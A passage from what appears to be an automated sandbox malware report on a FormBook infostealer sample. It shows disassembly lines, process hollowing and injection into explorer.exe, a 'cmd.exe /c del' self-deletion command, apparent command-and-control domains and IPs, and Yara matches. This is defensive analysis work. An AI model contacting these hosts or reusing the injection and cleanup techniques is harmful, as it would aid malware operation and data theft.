          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04388E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04398EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04368794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04412073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04421074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04424015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04424015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04370050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04370050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04355210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04373A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04368A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04425BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00409B50 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.gooooooo.xyz
          Source: C:\Windows\explorer.exeDomain query: www.carriewilliamsinc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 148.72.244.75 80
          Source: C:\Windows\explorer.exeDomain query: www.yixuan5.com
          Source: C:\Windows\explorer.exeDomain query: www.inslidr.com
          Source: C:\Windows\explorer.exeDomain query: www.farmacymerchants.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.246.248.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 840000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: unknown protection: read write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeMemory written: C:\Users\user\Desktop\5tCYPTkM6b.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3292
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.298778975.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.363976603.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.308798557.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.296008791.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.274396587.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.281179038.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.302392045.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,StrCmpNIW,lstrlenA,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
